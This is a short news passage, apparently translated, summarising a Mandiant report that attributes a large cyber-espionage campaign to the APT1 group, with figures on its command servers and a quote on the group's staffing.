The firm believes the group is APT1 sponsored by the Chinese government. Experts traced attacks up to four large networks in Shanghai and identified significant infrastructure, command servers, tools and tactics.

The scale of the infrastructure on which cybercriminals rely is impressive: 937 command servers hosted on 849 distinct IP addresses in 13 countries. To manage infected systems, the group used a remote desktop abroad. Mandiant believes hundreds of people could be behind these attacks.

"Given the scale, duration and type of criminal activity, APT1 operators had to rely on direct support from linguists, open-source specialists, malicious creators ON and industry experts translating tasks from customers to performers, as well as people who then transmit stolen information to customers," the report said. "The APT1 Group should also have a significant IT staff engaged in the purchase and maintenance of computer equipment and people who are engaged in finance, logistics and administrative and economic work."

Notes